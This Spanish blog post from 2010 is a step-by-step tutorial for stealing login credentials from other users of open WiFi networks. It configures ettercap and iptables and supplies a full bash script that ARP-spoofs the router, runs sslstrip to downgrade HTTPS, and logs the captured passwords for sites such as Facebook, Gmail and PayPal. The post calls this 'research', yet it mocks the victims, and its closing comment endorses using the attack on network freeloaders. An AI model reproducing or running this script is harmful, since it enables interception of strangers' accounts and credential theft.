domingo, 31 de octubre de 2010

SSLstrip : Obteniendo passwords de conexiones seguras : Hotmail, Facebook, Gmail , Paypal ..

El otro día tuve que realizar unas tareas de investigación, para comprobar la seguridad de un entorno Wifi, y quise utilizar ettercap a machete pero despues de una serie de problemas en su versión GTK y después de unas consultas y algún intercambio de correos con el amigo templix, me propuso utilizar sslstrip, una herramienta que es capaz de redirigir el trafico https a conexiones http, burlando por tanto el aviso de certificado falso y capturando en redes abiertas de un modo sencillisimo, los nombres de usuarios y contraseñas de todas aquellas " almas ingenuas ", que esten compartiendo la red con los investigadores ....

Para realizar todo esto, instale las siguientes herramientas:

sudo apt-get install ettercap

Una vez instalamos editamos el fichero de configuración:

sudo gedit /etc/etter.conf

Vamos a las lineas de iptable y las descomentamos: ( quedaran como las que pongo aquí abajo )

# if you use iptables:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

* guardamos los cambios y cerramos.

Ahora bajamos el siguiente paquete :

Lo descomprimimimos en una carpeta de nuestro sistema y entramos al directorio del sslstrip, ahi, ejecutamos la siguiente orden:

cd /home/usuario/ubicaciondesslstrip
sudo python setup.py install

* si falta alguna dependencia nos fijamos y la instalamos con el típico sudo apt-get .... bla bla bla

Bueno despues de este paso ya tenemos el ettercap ( version texto ) y el sslstrip listo en nuestro sistema, por lo que ya podemos borrar el directorio donde lo hemos descomprimido para limpiar un poco el sistema de espacio innecesario.

Bien, ahora nos toca aprender a usar estas herramientas, y para ello, lo más facil es utilizar un script, que he diseñado para que todo el proceso sea automático

Abrimos una consola y tecleamos: ( metemos en el fichero el script )

sudo gedit sslscript.sh

#!/bin/bash

echo 1 > /proc/sys/net/ipv4/ip_forward

echo -n "Dirección IP del router ( route ): "

read routerip

echo -n "Interface donde vamos a capturar (ej: wlan0): "

read iface

sudo xterm -geometry 75x15+1+300 -T "ARP Spoof" -e arpspoof -i $iface $routerip &

sleep 2

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 &

echo "Routed IP Tables"

sudo xterm -geometry 75x15+500+300 -T "SSL Strip - Si cierras esta ventana se pedira certificado" -e sslstrip -a -k -f &

echo "SSL Strip Launched successfully"

sleep 2

sudo xterm -geometry 75x15+500+300 -T "Ventana de logs capturas" -e tail -f sslstrip.log &

sudo xterm -geometry 75x15+1000+300 -T Ettercap -e ettercap -T -q -i $iface

killall sslstrip

killall arpspoof

Guardamos el fichero y desde consola le damos permisos de ejecucion :

chmod u+rwx sslscript.sh

Bien, ahora para probar estas herramientas, sin mucha complicación sera tan sencillo como por ejemplo teclear el script y poner los siguientes datos que nos pedira:

Dirección ip del router : Para saber cual es nuestra pasarela :

route

Nombre de nuestro interface desde el que vamos a capturar: ( wlan0, wlan1, eth1 ... etc )

iwconfig

Bien ahora teniendo anotados estos datos tan solo abrir la consola y teclear :

sudo bash sslscript.sh

Se abriran varias ventanas :

  1. Ventana de Arpspoof para engañar a la victima y decirle que nuestro equipo es ahora su pasarela
  2. Ventana Sslstrip ( es la que herramienta que se salta el certificado )
  3. Ventana Ettercap ( podemos ver las conexiones desde esta ventana y si cerramos la ventana del sslstrip, las contraseñas se comenzaran a capturar en esta ventana, aunque hay que tener entonces en cuenta que le saldría una ventana de aviso al equipo en cuestión diciendo que el certificado es falso, pero bueno, como estamos investigando asi podéis hacer pruebas )
  4. Ventana de log : es una ventana donde se ira viendo online las contraseñas capturadas.

Una vez que nos cansemos de hacer pruebas para localizar contraseñas podemos utilizar la orden tail junto con grep :

tail -f sslstrip.log | grep login

** Esta orden buscaria la palabra login en el fichero generado, en fin el " decidid vosotros que poner ahi " ;)

Bueno espero os haya gustado el script y la herramienta y sobre todo al igual que ocurrio con el script de intrusiones si alguno quiere mejorarlo, que lo públique que toda la comunidad a la que nos gustan estos temas lo agradecera.

Saludos.


Fuente:http://www.tuxapuntes.com/drupal/node/1915


Sin duda una muy buena manera de dar una leccion a esos listillos que se dedican a chuparte red ;)

No hay comentarios:

Publicar un comentario